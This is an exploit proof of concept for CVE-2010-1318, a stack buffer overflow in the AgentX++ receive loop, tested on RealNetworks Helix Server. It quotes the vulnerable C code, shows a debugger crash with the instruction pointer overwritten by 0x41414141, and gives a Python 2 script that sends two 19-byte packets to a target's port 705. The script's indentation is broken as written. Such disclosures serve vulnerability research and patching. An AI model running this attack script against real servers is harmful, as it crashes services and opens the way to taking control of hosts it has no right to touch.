Multiple Vendor AgentX++ - Stack Buffer Overflow (PoC)

# Exploit Title: Multiple Vendor AgentX++ Stack Buffer Overflow
Vulnerability
# Date: 2010-04-17
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: RealNetworks Helix Server v11
# CVE : CVE-2010-1318

#! /usr/bin/env python
###############################################################################
## File       :  zs_agentx_bof.py
## Description:
##            :
## Created_On :  Apr 17 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
int AgentX::receive_agentx(int sd, AgentXPdu& pdu)
{

    u_char        buffer[AGENTX_HEADER_LEN+1];                [1]
    u_int        payloadLen;
    boolean        netByteOrder;
    int        status;

    //  read header
    unsigned int bytesRead = 0;
    while (bytesRead < AGENTX_HEADER_LEN) {                     [2]
#ifdef WIN32
        if ((status = recv(sd, (char*)(buffer+bytesRead),
               AGENTX_HEADER_LEN, 0)) <= 0) {

        if (status == 0) return AGENTX_DISCONNECT;
        if (status == SOCKET_ERROR) {
            LOG_BEGIN(ERROR_LOG | 1);
            LOG("AgentX: receive socket error (errno)");
            LOG(WSAGetLastError());
            LOG_END;
            return AGENTX_DISCONNECT;
        }
        else {
            LOG_BEGIN(ERROR_LOG | 1);
            LOG("AgentX: receive unknown error (status)");
            LOG(status);
            LOG_END;
            return AGENTX_DISCONNECT;
        }
        }
#else
        if ((status = read(sd, (void *)(buffer+bytesRead),
                   AGENTX_HEADER_LEN)) <= 0) {

        if (status == 0) return AGENTX_DISCONNECT;
        if (errno == EBADF) return AGENTX_BADF;
        else {
            LOG_BEGIN(ERROR_LOG | 1);
            LOG("AgentX: receive unknown error (errno)");
            LOG(errno);
            LOG_END;
            return AGENTX_ERROR;
        }
        }
#endif
        bytesRead += status;
    }


[1] Allocates 0x14 bytes stack buffer
[2] The check should be consider the remainder bytes of the buffer

if we only send the data < 0x13 bytes, 2 packets will overwrite the stack
buffer.

0:009> g
(728.a3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=fffffff6 ebx=00000000 ecx=00161230 edx=7c8285ec esi=00cbfd14
edi=00ccff80
eip=41414141 esp=00cbfd08 ebp=41414141 iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010202
41414141 ??              ???
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\WINDOWS\system32\mswsock.dll -
0:006> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
00cbfd04 00edda20 0x41414141
00cbfd18 7c829fb5 0xedda20
00cbfd24 7c829f3d ntdll!RtlGetNtGlobalFlags+0x38
00cbfe0c 71b21a03 ntdll!RtlFreeHeap+0x126
00000000 00000000 mswsock+0x1a03

"""

import sys
import socket

if (len(sys.argv) != 2):
    print "Usage:\t%s [target]" % sys.argv[0]
    sys.exit(0)


data = "A" * 19

host = sys.argv[1]
port = 705

print "PoC for CVE-2010-1318 by ZSploit.com"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
    s.connect((host, port))
    print "Sending payload .."
        s.send(data)
    s.send(data)
    except:
        print "Error in send"
    print "Done"
except:
    print "Error in socket"